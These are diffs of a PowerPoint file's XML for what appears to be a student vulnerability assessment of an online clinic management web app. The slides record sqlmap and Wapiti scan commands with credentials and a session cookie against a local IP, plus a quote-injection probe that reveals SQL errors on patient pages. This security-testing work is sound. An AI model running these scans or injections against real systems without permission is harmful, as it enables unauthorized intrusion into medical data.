--- a/Presentation Slides/Presentation Slide.pptx
+++ b/Presentation Slides/Presentation Slide.pptx
@@ -12,6 +12,7 @@
     <p:sldId id="261" r:id="rId6"/>
     <p:sldId id="262" r:id="rId7"/>
     <p:sldId id="263" r:id="rId8"/>
+    <p:sldId id="264" r:id="rId9"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -110,6 +111,11 @@
       </a:defRPr>
     </a:lvl9pPr>
   </p:defaultTextStyle>
+  <p:extLst>
+    <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
+      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main"/>
+    </p:ext>
+  </p:extLst>
 </p:presentation>
 </file>
 
@@ -5230,6 +5236,235 @@
 </p:sld>
 </file>
 
+<file path=ppt/slides/slide8.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{735979F9-1635-4730-AF58-2D0FD3B2447D}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2231135" y="143598"/>
+            <a:ext cx="7729728" cy="640173"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="90000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>SQLMap</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t> report</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Content Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E4F219B-F14B-4E42-8E67-2D428C9998F5}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="196637" y="1620407"/>
+            <a:ext cx="4068996" cy="4732670"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>sudo</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>sqlmap</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t> -u 192.168.0.61/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>ocms</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>index.php?signIn</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>=1 -crawl=3 --</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>dbms</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>=</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>mysql</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t> --cookie=</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>online_clinic_management_system</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>=hl6aaf2t1hc2i6runicnmscrmn --</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>dbs</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t> --data="user=</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>admin&amp;password</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>=admin" --level=5 --risk=3</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>Scan Started at 22:08 16-04-2020 EST</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>Scan Ended at 10:32 17-04-2020 EST</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>Total Time - 12 hours 24 mins </a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="7" name="Picture 6" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0BDC778-9854-4857-8EDC-891BF6B80134}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill rotWithShape="1">
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:srcRect l="295" t="10377" r="-295" b="-10377"/>
+          <a:stretch/>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4265635" y="1143466"/>
+            <a:ext cx="7729728" cy="5996940"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3830457467"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
 <file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
 <a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Parcel">
   <a:themeElements>

--- a/Presentation Slides/Presentation Slide.pptx
+++ b/Presentation Slides/Presentation Slide.pptx
@@ -3602,7 +3602,7 @@
           <p:nvPr>
             <p:extLst>
               <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
-                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3903649467"/>
+                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2772169713"/>
               </p:ext>
             </p:extLst>
           </p:nvPr>
@@ -3734,7 +3734,7 @@
                     <a:p>
                       <a:r>
                         <a:rPr lang="en-CA" dirty="0"/>
-                        <a:t>Yassine</a:t>
+                        <a:t>Yassine Khalifa</a:t>
                       </a:r>
                     </a:p>
                   </a:txBody>
@@ -3755,7 +3755,10 @@
                     <a:bodyPr/>
                     <a:lstStyle/>
                     <a:p>
-                      <a:endParaRPr lang="en-CA" dirty="0"/>
+                      <a:r>
+                        <a:rPr lang="en-CA" dirty="0"/>
+                        <a:t>26950957</a:t>
+                      </a:r>
                     </a:p>
                   </a:txBody>
                   <a:tcPr>
@@ -4931,7 +4934,7 @@
         </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="4834093" y="849086"/>
+            <a:off x="4892816" y="849086"/>
             <a:ext cx="7186488" cy="5921262"/>
           </a:xfrm>
         </p:spPr>
@@ -4950,8 +4953,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="697607" y="1147666"/>
-            <a:ext cx="3067058" cy="369332"/>
+            <a:off x="412381" y="1248333"/>
+            <a:ext cx="4453079" cy="3139321"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4965,9 +4968,166 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-CA" dirty="0"/>
-              <a:t>*write some explanation here*</a:t>
-            </a:r>
+              <a:rPr lang="en-CA" b="1" u="sng" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>SQL injection: </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" b="1" u="sng" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="404040"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" u="sng" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Authenticated Automatic Scan</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" b="1" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="404040"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>GET Request  from </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>patient_prescription.php</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> with parameter</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>‘search=</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>vega</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>’”’</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Output Result </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              </a:rPr>
+              <a:t> SQL syntax error message</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="404040"/>
+              </a:solidFill>
+              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              </a:rPr>
+              <a:t>2. Same output results for </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              </a:rPr>
+              <a:t>patient_diagnosis.php</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              </a:rPr>
+              <a:t> and </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              </a:rPr>
+              <a:t>patient_history.php</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="404040"/>
+              </a:solidFill>
+            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>

--- a/Presentation Slides/Presentation Slide.pptx
+++ b/Presentation Slides/Presentation Slide.pptx
@@ -13,6 +13,7 @@
     <p:sldId id="262" r:id="rId7"/>
     <p:sldId id="263" r:id="rId8"/>
     <p:sldId id="264" r:id="rId9"/>
+    <p:sldId id="265" r:id="rId10"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -5625,6 +5626,184 @@
 </p:sld>
 </file>
 
+<file path=ppt/slides/slide9.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{735979F9-1635-4730-AF58-2D0FD3B2447D}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2231135" y="143598"/>
+            <a:ext cx="7729728" cy="640173"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="90000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA"/>
+              <a:t>Wapiti report</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Content Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E4F219B-F14B-4E42-8E67-2D428C9998F5}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="196637" y="1695226"/>
+            <a:ext cx="4366032" cy="4732670"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" sz="2400" dirty="0" err="1"/>
+              <a:t>sudo</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
+              <a:t> wapiti -u http://192.168.0.61/ocms/ --scope punk -m </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" sz="2400" dirty="0" err="1"/>
+              <a:t>sql,xss,shellshock,blindsql,nikto</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
+              <a:t> -l 2 --auth-type basic -a </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" sz="2400" dirty="0" err="1"/>
+              <a:t>admin%admin</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
+              <a:t> -d 10 -f html -o /home/kali/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" sz="2400" dirty="0" err="1"/>
+              <a:t>wapiti_result_new</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" sz="2400" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" sz="2400" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
+              <a:t>Apache Server Sided Issues only.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a social media post&#10;&#10;Description automatically generated">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01039D84-66DB-4494-8B73-9750797DB711}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4744696" y="1601920"/>
+            <a:ext cx="7102089" cy="4209807"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1829199038"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
 <file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
 <a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Parcel">
   <a:themeElements>

--- a/Presentation Slides/Presentation Slide.pptx
+++ b/Presentation Slides/Presentation Slide.pptx
@@ -7,13 +7,17 @@
   <p:sldIdLst>
     <p:sldId id="257" r:id="rId2"/>
     <p:sldId id="256" r:id="rId3"/>
-    <p:sldId id="258" r:id="rId4"/>
-    <p:sldId id="260" r:id="rId5"/>
-    <p:sldId id="261" r:id="rId6"/>
-    <p:sldId id="262" r:id="rId7"/>
-    <p:sldId id="263" r:id="rId8"/>
-    <p:sldId id="264" r:id="rId9"/>
-    <p:sldId id="265" r:id="rId10"/>
+    <p:sldId id="265" r:id="rId4"/>
+    <p:sldId id="258" r:id="rId5"/>
+    <p:sldId id="269" r:id="rId6"/>
+    <p:sldId id="261" r:id="rId7"/>
+    <p:sldId id="260" r:id="rId8"/>
+    <p:sldId id="268" r:id="rId9"/>
+    <p:sldId id="262" r:id="rId10"/>
+    <p:sldId id="263" r:id="rId11"/>
+    <p:sldId id="264" r:id="rId12"/>
+    <p:sldId id="266" r:id="rId13"/>
+    <p:sldId id="267" r:id="rId14"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -3603,7 +3607,7 @@
           <p:nvPr>
             <p:extLst>
               <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
-                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2772169713"/>
+                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1160014339"/>
               </p:ext>
             </p:extLst>
           </p:nvPr>
@@ -3675,8 +3679,13 @@
                     <a:p>
                       <a:r>
                         <a:rPr lang="en-CA" dirty="0"/>
-                        <a:t>Samer</a:t>
+                        <a:t>Samer </a:t>
                       </a:r>
+                      <a:r>
+                        <a:rPr lang="en-CA" dirty="0" err="1"/>
+                        <a:t>Zerez</a:t>
+                      </a:r>
+                      <a:endParaRPr lang="en-CA" dirty="0"/>
                     </a:p>
                   </a:txBody>
                   <a:tcPr>
@@ -3701,7 +3710,10 @@
                     <a:bodyPr/>
                     <a:lstStyle/>
                     <a:p>
-                      <a:endParaRPr lang="en-CA" dirty="0"/>
+                      <a:r>
+                        <a:rPr lang="en-CA" dirty="0"/>
+                        <a:t>40099650</a:t>
+                      </a:r>
                     </a:p>
                   </a:txBody>
                   <a:tcPr>
@@ -3881,1419 +3893,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide2.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71FD05CA-2433-498B-BAE8-815C0650423E}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="ctrTitle"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" dirty="0"/>
-              <a:t>Vulnerability Analysis of an open-source Web Application</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Subtitle 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49D9CB6B-7603-4FEE-81C8-0E6E909D3367}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="subTitle" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1600200" y="4357818"/>
-            <a:ext cx="9144000" cy="1655762"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" sz="2800" dirty="0"/>
-              <a:t>(Online Clinic Management System)</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4200200636"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide3.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:bg>
-      <p:bgPr>
-        <a:solidFill>
-          <a:schemeClr val="bg1"/>
-        </a:solidFill>
-        <a:effectLst/>
-      </p:bgPr>
-    </p:bg>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="Rectangle 7">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AEFFFF2-9EB4-4B6C-B9F8-2BA3EF89A21C}"/>
-              </a:ext>
-              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
-                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:extLst>
-              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
-                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
-              </p:ext>
-            </p:extLst>
-          </p:nvPr>
-        </p:nvSpPr>
